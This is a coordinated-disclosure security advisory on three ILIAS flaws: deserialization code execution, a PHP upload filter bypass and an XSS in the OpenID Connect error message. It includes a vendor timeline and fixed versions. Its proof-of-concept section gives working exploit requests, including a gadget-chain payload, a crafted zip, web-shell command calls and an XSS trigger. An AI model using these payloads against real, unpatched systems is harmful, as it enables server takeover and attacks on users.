`SEC Consult Vulnerability Lab Security Advisory < 20230627-0 > ======================================================================= title: Multiple high risk vulnerabilities product: ILIAS eLearning platform vulnerable version: see section "Vulnerable version" below fixed version: see section "Solution" below CVE number: - impact: High homepage: https://www.ilias.de found: 2022-12-28 by: Armin Stock (Atos) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Around since 1998, ILIAS is a powerful learning management system that fulfills all your requirements. Using its integrated tools, small and large businesses, universities, schools and public authorities are able to create tailored, individual learning scenarios." Source: https://www.ilias.de/en/ Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Authenticated remote code execution (ilObjRoleGUI) The function `changeExistingObjectsObject` of the class `ilObjRoleGUI` passes user-controlled data to the `unserialize` function. ------------------------------------------------------------------------------- # FILE: Services/AccessControl/classes/class.ilObjRoleGUI.php /** * Change existing objects * @return */ protected function changeExistingObjectsObject() { global $DIC; $tree = $DIC['tree']; $rbacreview = $DIC['rbacreview']; $rbacadmin = $DIC['rbacadmin']; $mode = (int) $_POST['mode']; $start = ($this->obj_ref_id == ROLE_FOLDER_ID ? ROOT_FOLDER_ID : $this->obj_ref_id); $this->object->changeExistingObjects($start, $mode, unserialize(ilUtil::stripSlashes($_POST['type_filter']))); ilUtil::sendSuccess($this->lng->txt('settings_saved'), true); $this->ctrl->redirect($this, 'perm'); } ------------------------------------------------------------------------------- The user-controlled `POST` parameter `type_filter` is passed to the `unserialize` function. The function `ilUtil::stripSlashes` only tries to protect against `HTML injection` and does not interfere with the serialized payload. To be able to exploit this vulnerability it is required to have `edit_permission` on an object, which supports the `ilPermissionGUI` command and has a `ref_id`. Also an `obj_id` of a role is required. As an example the `course` object is used. ------------------------------------------------------------------------------- # FILE: Services/AccessControl/classes/class.ilPermissionGUI.php public function executeCommand() { global $DIC; $rbacsystem = $DIC['rbacsystem']; $ilErr = $DIC['ilErr']; if (!$rbacsystem->checkAccess("edit_permission", $this->gui_obj->object->getRefId())) { $ilErr->raiseError($this->lng->txt("permission_denied"), $ilErr->MESSAGE); } $next_class = $this->ctrl->getNextClass($this); switch ($next_class) { case "ilobjrolegui": $this->ctrl->setReturn($this, 'perm'); include_once("Services/AccessControl/classes/class.ilObjRoleGUI.php"); $this->gui_obj = new ilObjRoleGUI("", (int) $_GET["obj_id"], false, false); $ret = $this->ctrl->forwardCommand($this->gui_obj); break; ------------------------------------------------------------------------------- 2) ilUtil::renameExecutables bypass allows PHP code execution The ILIAS platform uses the function `ilUtils::renameExecutables` in the `ilFileSystemGUI` class (used to upload or unzip files for various objects), to prevent the upload of executable files like `.php`. -------------------------------------------------------------------------------- # File: ILIAS-7.17\Services\FileSystem\classes\class.ilFileSystemGUI.php /** * delete object file */ public function unzipFile($a_file = null) { # ... if (@is_file($a_file)) { include_once("./Services/Utilities/classes/class.ilFileUtils.php"); $cur_files = array_keys(ilUtil::getDir($cur_dir)); $cur_files_r = iterator_to_array(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($cur_dir))); if ($this->getAllowDirectories()) { ilUtil::unzip($a_file, true); } else { ilUtil::unzip($a_file, true, true); } # ... } # Call to renameExecutables, after a ZIP file has be unzipped ilUtil::renameExecutables($this->main_dir); $this->ctrl->saveParameter($this, self::CDIR); ilUtil::sendSuccess($lng->txt("cont_file_unzipped"), true); $this->ctrl->redirect($this, "listFiles"); } -------------------------------------------------------------------------------- This function changes the extension of all files, which have an extension specified in the variables `SUFFIX_REPL_DEFAULT` and `SUFFIX_REPL_ADDITIONAL` to `.sec`. -------------------------------------------------------------------------------- # File: ILIAS-7.17\Services\Init\classes\class.ilInitialisation.php // define default suffix replacements define("SUFFIX_REPL_DEFAULT", "php,php3,php4,inc,lang,phtml,htaccess"); define("SUFFIX_REPL_ADDITIONAL", $ilSetting->get("suffix_repl_additional")); # File: ILIAS-7.17\Services\Utilities\classes\class.ilUtil.php /** * Rename uploaded executables for security reasons. * * @static * */ public static function renameExecutables($a_dir) { $def_arr = explode(",", SUFFIX_REPL_DEFAULT); foreach ($def_arr as $def) { ilUtil::rRenameSuffix($a_dir, trim($def), "sec"); } $def_arr = explode(",", SUFFIX_REPL_ADDITIONAL); foreach ($def_arr as $def) { ilUtil::rRenameSuffix($a_dir, trim($def), "sec"); } } -------------------------------------------------------------------------------- The `ilUtil::rRenameSuffix` is responsible for renaming the provided suffixes to the `sec` suffix. To achieve this it does the following: a) Iterate the provided directory, skipping the `.` and `..` files b) Test if the filename ends with a dot and removes it: `foo.php.` --> `foo.php` c) Test if the filename has the provided suffix and replace it with `sec`: `foo.php` --> `foo.sec` -------------------------------------------------------------------------------- /** * Renames all files with certain suffix and gives them a new suffix. * This words recursively through a directory. * * @param string $a_dir directory * @param string $a_old_suffix old suffix * @param string $a_new_suffix new suffix * * @access public * @static * */ public static function rRenameSuffix($a_dir, $a_old_suffix, $a_new_suffix) { # ... // read a_dir $dir = opendir($a_dir); while ($file = readdir($dir)) { if ($file != "." and $file != "..") { // directories if (@is_dir($a_dir . "/" . $file)) { ilUtil::rRenameSuffix($a_dir . "/" . $file, $a_old_suffix, $a_new_suffix); } // files if (@is_file($a_dir . "/" . $file)) { // first check for files with trailing dot if (strrpos($file, '.') == (strlen($file) - 1)) { rename($a_dir . '/' . $file, substr($a_dir . '/' . $file, 0, -1)); $file = substr($file, 0, -1); } $path_info = pathinfo($a_dir . "/" . $file); if (strtolower($path_info["extension"]) == strtolower($a_old_suffix)) { $pos = strrpos($a_dir . "/" . $file, "."); $new_name = substr($a_dir . "/" . $file, 0, $pos) . "." . $a_new_suffix; rename($a_dir . "/" . $file, $new_name); } } } } return true; } -------------------------------------------------------------------------------- The first test can be abused to generate a `PHP` warning. If the uploaded file has the name `...` it tries to rename it to `..` which is not possible and results in a warning: -------------------------------------------------------------------------------- php > rename("./...", ".."); PHP Warning: rename(./...,..): Device or resource busy in php shell code on line 1 -------------------------------------------------------------------------------- This behavior by itself would be no problem, but `ILIAS` uses the `https://github.com/filp/whoops` library. This library turns `PHP` errors into exceptions (if not ignored by the `php.ini` value `error_reporting`). `ILIAS` recommends to set this variable to `error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT ; PHP 5.4.0 and higher` (see https://docu.ilias.de/goto_docu_lm_367.html), which would enable the warning and trigger the exception. As there is no `catch` block in the `rRenameSuffix` function the iteration of the directory is stopped and other files, which actually do have a `.php` suffix are not processed, resulting in an uploaded file with an unallowed suffix `.php`. 3) Unauthenticated XSS via OpenIDConnect error message The ILIAS platform uses the `https://github.com/jumbojett/OpenID-Connect-PHP` library for its `OpenID-Connect` authentication implementation. During the call to the `OpenIDConnectClient::authenticate` function, this library accepts the `error_description` parameter from the `$_REQUEST` object, which is used for the error message in an exception. The code throws this exception, if the `error` parameter is also present in the `$_REQUEST` object. -------------------------------------------------------------------------------- # FILE: ILIAS-7.17\libs\composer\vendor\jumbojett\openid-connect-php\src\OpenIDConnectClient.php /** * @return bool * @throws OpenIDConnectClientException */ public function authenticate() { // Do a preemptive check to see if the provider has thrown an error from a previous redirect if (isset($_REQUEST['error'])) { $desc = isset($_REQUEST['error_description']) ? ' Description: ' . $_REQUEST['error_description'] : ''; throw new OpenIDConnectClientException('Error: ' . $_REQUEST['error'] .$desc); } -------------------------------------------------------------------------------- The implementation of the `OpenID-Connect` auth provider catches any exception thrown during the authentication process and uses the error message of the exception to set the current status of the login. -------------------------------------------------------------------------------- # File: ILIAS-7.17\Services\OpenIdConnect\classes\class.ilAuthProviderOpenIdConnect.php /** * Do authentication * @param \ilAuthStatus $status Authentication status * @return bool */ public function doAuthentication(\ilAuthStatus $status) { try { $oidc = $this->initClient(); $oidc->setRedirectURL(ILIAS_HTTP_PATH . '/openidconnect.php'); # ... # Call OpenIDConnectClient::authenticate $oidc->authenticate(); # .... } catch (Exception $e) { $this->getLogger()->warning($e->getMessage()); $this->getLogger()->warning($e->getCode()); $status->setStatus(ilAuthStatus::STATUS_AUTHENTICATION_FAILED); # Set status message using the exception message, which is controlled # by the attacker $status->setTranslatedReason($e->getMessage()); return false; } } -------------------------------------------------------------------------------- Depending on status of the login, the `ilStartUpGUI::doOpenIdConnectAuthentication` function sends a failure message to the user based on the `$status->getTranslateReason()` text. -------------------------------------------------------------------------------- /** * do open id connect authentication */ protected function doOpenIdConnectAuthentication() { global $DIC; $this->getLogger()->debug('Trying openid connect authentication'); # ... $frontend->authenticate(); switch ($status->getStatus()) { case ilAuthStatus::STATUS_AUTHENTICATED: # ... case ilAuthStatus::STATUS_AUTHENTICATION_FAILED: # Send failure message to the user ilUtil::sendFailure($status->getTranslatedReason(), true); $GLOBALS['ilCtrl']->redirect($this, 'showLoginPage'); return false; } # ... } -------------------------------------------------------------------------------- This error message, which can contain `HTML` code is later displayed to the user by the error subsystem, which does not encode the error message. The messages are created based on the `tpl.message.html` template and rendered as the `{MESSAGE}` template variable. -------------------------------------------------------------------------------- # File: ILIAS-7.17\Services\UICore\classes\class.ilGlobalTemplate.php /** * Fill message area. */ private function fillMessage() { global $DIC; $out = ""; foreach (self::$message_types as $m) { $txt = $this->getMessageTextForType($m); if ($txt != "") { $out .= ilUtil::getSystemMessageHTML($txt, $m); } $request = $DIC->http()->request(); $accept_header = $request->getHeaderLine('Accept'); if (isset($_SESSION[$m]) && $_SESSION[$m] && ($accept_header !== 'application/json')) { unset($_SESSION[$m]); } } if ($out != "") { $this->setVariable("MESSAGE", $out); } } # File: ILIAS-7.17\Services\Utilities\classes\class.ilUtil.php /** * Get HTML for a system message * * ATTENTION: This method is deprecated. Use MessageBox from the * UI-framework instead. */ public static function getSystemMessageHTML($a_txt, $a_type = "info") { global $DIC; $lng = $DIC->language(); $mtpl = new ilTemplate("tpl.message.html", true, true, "Services/Utilities"); $mtpl->setCurrentBlock($a_type . "_message"); $mtpl->setVariable("TEXT", $a_txt); $mtpl->setVariable("MESSAGE_HEADING", $lng->txt($a_type . "_message")); $mtpl->parseCurrentBlock(); return $mtpl->get(); } -------------------------------------------------------------------------------- Proof of concept: ----------------- 1) Authenticated remote code execution (ilObjRoleGUI) Prerequisite: User with `edit_permission` on a `course` object Parameter details: * ref_id=80 -> Course object * obj_id=4 -> Role object * cmdNode=wh:ln:ux:px -> Command flow denoted by CIDs (installation dependent) * cmd=changeExistingObjects -> Function to call on the `ilObjRoleGUI` object * type_filter -> payload, generated with [PHPGGC](https://github.com/ambionics/phpggc) `./phpggc -S Monolog/RCE5 system "touch /tmp/exploit"` CIDs: * wh = ilrepositorygui * ln = ilobjcoursegui * ux = ilpermissiongui * px = ilobjrolegui The following POST request exploits this issue and creates the file /tmp/exploit as a proof of concept: ------------------------------------------------------------------------------- POST /ilias.php?ref_id=80&cmdClass=ilpermissiongui&cmdNode=wh:ln:ux:px&baseClass=ilrepositorygui&obj_id=4&cmd=changeExistingObjects HTTP/1.1 Host: ilias.local:9080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://ilias.local:9080/ilias.php?ref_id=80&cmdClass=ilrepositorygui&cmdNode=wh&baseClass=ilrepositorygui Cookie: ilClientId=myilias; PHPSESSID=a29f6435073c76b3c6477a8b154c91e1; 1453197475={"any_entry_engaged":false,"tools_engaged":false,"more_available":false,"entries":{"0:0":[0,0,0],"0:1":[0,0,0],"0:1:1":[0,1,0],"0:1:2":[0,0,0],"0:2":[0,0,0],"0:2:0":[0,0,0],"0:2:1":[0,0,0],"0:3":[0,0,0],"0:4":[0,0,0],"0:5":[0,0,1]},"tools":{"696c434f50616765456469744753546f6f6c50726f76696465727c636f70675f656469746f72":[0,0,0,"T:0"]},"known_tools":["696c576f726b73706163654753546f6f6c50726f76696465727c74726565","696c434f50616765456469744753546f6f6c50726f76696465727c636f70675f656469746f72","4d61696c476c6f62616c53637265656e546f6f6c50726f76696465727c6d61696c5f666f6c646572735f74726565"],"last_active_top":"0:2"}; il_mb_slates={"engaged":false} Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 495 type_filter=<@urlencode>O:37:"Monolog\Handler\FingersCrossedHandler":3:{S:16:"\00\2a\00\70\61\73\73\74\68\72\75\4c\65\76\65\6c";i:0;S:9:"\00\2a\00\62\75\66\66\65\72";a:1:{S:4:"\74\65\73\74";a:2:{i:0;S:18:"\74\6f\75\63\68\20\2f\74\6d\70\2f\65\78\70\6c\6f\69\74";S:5:"\6c\65\76\65\6c";N;}}S:10:"\00\2a\00\68\61\6e\64\6c\65\72";O:28:"Monolog\Handler\GroupHandler":1:{S:13:"\00\2a\00\70\72\6f\63\65\73\73\6f\72\73";a:2:{i:0;S:7:"\63\75\72\72\65\6e\74";i:1;S:6:"\73\79\73\74\65\6d";}}} <@/urlencode> ------------------------------------------------------------------------------- After sending this request the file `/tmp/exploit` is created. ------------------------------------------------------------------------------- user@d93129388baa:/var/www/logs# ls -la /tmp total 16 drwxrwxrwt 1 root root 4096 Dec 28 06:07 . drwxr-xr-x 1 root root 4096 Dec 26 04:12 .. -rw-r--r-- 1 www-data www-data 0 Dec 28 06:07 exploit ------------------------------------------------------------------------------- 2) ilUtil::renameExecutables bypass allows PHP code execution To exploit this issue the `MediaObject` object type can be used, as uploaded files are placed in a known directory which is accessible via the web server. This allows the execution of the `.php` script after uploading. As a first step a new `MediaObject` has to be created. Then the attacker has to navigate to `Properties -> Files` of this object. Afterwards a new `.zip` archive can be uploaded with the following content: -------------------------------------------------------------------------------- => ILIAS unzip -l ilias-exploit-dot.zip Archive: ilias-exploit-dot.zip Length Date Time Name --------- ---------- ----- ---- 92 2022-12-27 01:28 exploit.php 35 1980-01-01 00:00 style_import/... 92 2022-12-27 01:28 style_import/exploit.php --------- ------- 219 3 files -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- #File: exploit.php -------------------------------------------------------------------------------- After uploading this archive it can be unzipped using the `unzip` command of `ilFileSystemGUI` class. During the unzip process the following exception occurs: -------------------------------------------------------------------------------- Whoops\Exception\ErrorException thrown with message "rename(./data/myilias/mobs/mm_318/style_import/...,./data/myilias/mobs/mm_318/style_import/..): Device or resource busy" Stacktrace: #24 Whoops\Exception\ErrorException in /var/www/html/Services/Utilities/classes/class.ilUtil.php:3593 #23 rename in /var/www/html/Services/Utilities/classes/class.ilUtil.php:3593 #22 ilUtil:rRenameSuffix in /var/www/html/Services/Utilities/classes/class.ilUtil.php:3586 #21 ilUtil:rRenameSuffix in /var/www/html/Services/Utilities/classes/class.ilUtil.php:3510 #20 ilUtil:renameExecutables in /var/www/html/Services/FileSystem/classes/class.ilFileSystemGUI.php:926 #19 ilFileSystemGUI:unzipFile in /var/www/html/Services/FileSystem/classes/class.ilFileSystemGUI.php:448 #18 ilFileSystemGUI:extCommand in /var/www/html/Services/FileSystem/classes/class.ilFileSystemGUI.php:257 #17 ilFileSystemGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #16 ilCtrl:forwardCommand in /var/www/html/Services/MediaObjects/classes/class.ilObjMediaObjectGUI.php:277 #15 ilObjMediaObjectGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #14 ilCtrl:forwardCommand in /var/www/html/Services/COPage/classes/class.ilPCMediaObjectGUI.php:198 #13 ilPCMediaObjectGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #12 ilCtrl:forwardCommand in /var/www/html/Services/COPage/classes/class.ilPageEditorGUI.php:401 #11 ilPageEditorGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #10 ilCtrl:forwardCommand in /var/www/html/Services/COPage/classes/class.ilPageObjectGUI.php:1113 #9 ilPageObjectGUI:executeCommand in /var/www/html/Modules/Blog/classes/class.ilBlogPostingGUI.php:166 #8 ilBlogPostingGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #7 ilCtrl:forwardCommand in /var/www/html/Modules/Blog/classes/class.ilObjBlogGUI.php:697 #6 ilObjBlogGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #5 ilCtrl:forwardCommand in /var/www/html/Services/PersonalWorkspace/classes/class.ilPersonalWorkspaceGUI.php:165 #4 ilPersonalWorkspaceGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #3 ilCtrl:forwardCommand in /var/www/html/Services/Dashboard/classes/class.ilDashboardGUI.php:262 #2 ilDashboardGUI:executeCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:217 #1 ilCtrl:forwardCommand in /var/www/html/Services/UICore/classes/class.ilCtrl.php:178 #0 ilCtrl:callBaseClass in /var/www/html/ilias.php:23 -------------------------------------------------------------------------------- As there is no exception processing present in the rename function it skips all other files, leaving the file `exploit.php` with the `.php` suffix as it is. -------------------------------------------------------------------------------- root@4967b59b6950:/var/www/html/data/myilias/mobs/mm_318# ls -la ./** -rwxr-xr-x 1 www-data www-data 45 Jan 17 13:28 ./exploit.php -rw-r--r-- 1 www-data www-data 639 Jan 17 13:21 ./ilias-exploit-dot.zip ./style_import: total 16 drwxr-xr-x 2 www-data www-data 4096 Jan 17 13:21 . drwxr-xr-x 3 www-data www-data 4096 Jan 17 13:28 .. -rwxrwxrwx 1 www-data www-data 35 Jan 1 1980 ... -rwxr-xr-x 1 www-data www-data 92 Dec 27 01:28 exploit.sec -------------------------------------------------------------------------------- As an example, the program `whoami` can then be executed with the following request via the uploaded PHP shell: -------------------------------------------------------------------------------- GET /data/myilias/mobs/mm_318/exploit.php?cmd=whoami HTTP/1.1 Host: ilias.local:9080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ilClientId=myilias; PHPSESSID=efb0b80d14d4ffa22369b1750ed26a6a; 1453197475={"any_entry_engaged":true,"tools_engaged":true,"more_available":false,"entries":{"0:0":[0,0,0],"0:1":[0,0,0],"0:1:1":[0,0,0],"0:1:2":[0,0,0],"0:2":[0,0,0],"0:2:0":[0,0,0],"0:2:1":[0,0,0],"0:3":[0,0,0],"0:4":[0,0,0],"0:5":[0,0,1]},"tools":{"696c434f50616765456469744753546f6f6c50726f76696465727c636f70675f656469746f72":[0,1,0,"T:0"],"696c576f726b73706163654753546f6f6c50726f76696465727c74726565":[0,0,0,"T:1"]},"known_tools":["696c434f50616765456469744753546f6f6c50726f76696465727c636f70675f656469746f72","696c576f726b73706163654753546f6f6c50726f76696465727c74726565"],"last_active_top":"0:2"} Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- Response: -------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Tue, 17 Jan 2023 13:28:32 GMT Server: Apache/2.4.52 (Debian) X-Powered-By: PHP/7.3.33 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19 www-data www-data -------------------------------------------------------------------------------- 3) Unauthenticated XSS via OpenIDConnect error message The following request can be used to trigger the vulnerability: -------------------------------------------------------------------------------- GET /openidconnect.php?error=1&error_description=XSS- HTTP/1.1 Host: ilias.local:9080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- The response to this request is a redirect to the URL (`/ilias.php?lang=de&cmd=showLoginPage&cmdClass=ilstartupgui&cmdNode=zq&baseClass=ilStartUpGUI`), which displays the error message and shows the `alert` box: -------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Tue, 17 Jan 2023 10:03:06 GMT Server: Apache/2.4.52 (Debian) X-Powered-By: PHP/7.3.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 20369 Connection: close Content-Type: text/html; charset=UTF-8

Fehlermeldung

Error: 1 Description: XSS-

-------------------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- The vulnerabilities were identified in ILIAS version v7.17 2022-12-21 which was the latest version available at the time of the test. Previous branches, such as version 6 are affected as well. Version 8 was not available at the time of the test yet, but fixes have been incorporated in the release as well. The identified vulnerabilities have been fixed in different versions (see solution section below). Hence the affected versions differ, depending on the vulnerability. * Vulnerability 1) <7.22 and <8.3 * Vulnerability 2) <6.22, <7.18, <8.0 * Vulnerability 3) <6.23, <7.19, <8.0 Vendor contact timeline: ------------------------ 2023-01-20: Contacting vendor through security@lists.ilias.de and established contact from previous advisory; quick vendor reply. 2023-01-30: Vendor acknowledged the vulnerabilities 2023-02-06: A fix for one of vulnerabilities was released 2023-03-27: All vulnerabilities seem to be fixed in branch 7.xx, is release possible? 2023-03-28: Vendor asked to postpone public release of advisory to end of May as vulnerability 1) will be addressed with a more proper fix later. 2023-05-22: Asking vendor about the timeline of the public release and the fixed version in the different branches. 2023-05-23: Vendor answers that vulnerability 1) is not fully fixed yet and provides information regarding affected/fixed versions for 2) and 3). 2023-05-31: Vendor provides update regarding timeline, fix for issue 1) is either planned for 21st or 28th June in release v8.3. It is properly fixed in v7.22. Asked to delay security advisory for one week after patch publication. 2023-06-01: Confirming timeline and advisory release date. 2023-06-20: Asking for status update, if patch will be released on 21st or 28th June. 2023-06-20: Vendor: release is planned for today, scheduling advisory release for 27th June. 2023-06-27: Coordinated release of security advisory. Solution: --------- The vendor provides updated versions which mitigate the identified vulnerabilities. Vulnerability 1) is fixed in versions or higher: 7.22, 8.3 Vulnerability 2) is fixed in versions or higher: 6.22, 7.18, 8.0 Vulnerability 3) is fixed in versions or higher: 6.23, 7.19, 8.0 The patches can be downloaded from the vendor's website where they also provide detailed changelogs for the patches: https://docu.ilias.de/ilias.php?ref_id=1719&obj_id=229&cmd=layout&cmdClass=illmpresentationgui&cmdNode=13g&baseClass=ilLMPresentationGUI SEC Consult recommends updating to the latest version available. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Armin Stock / @2023 `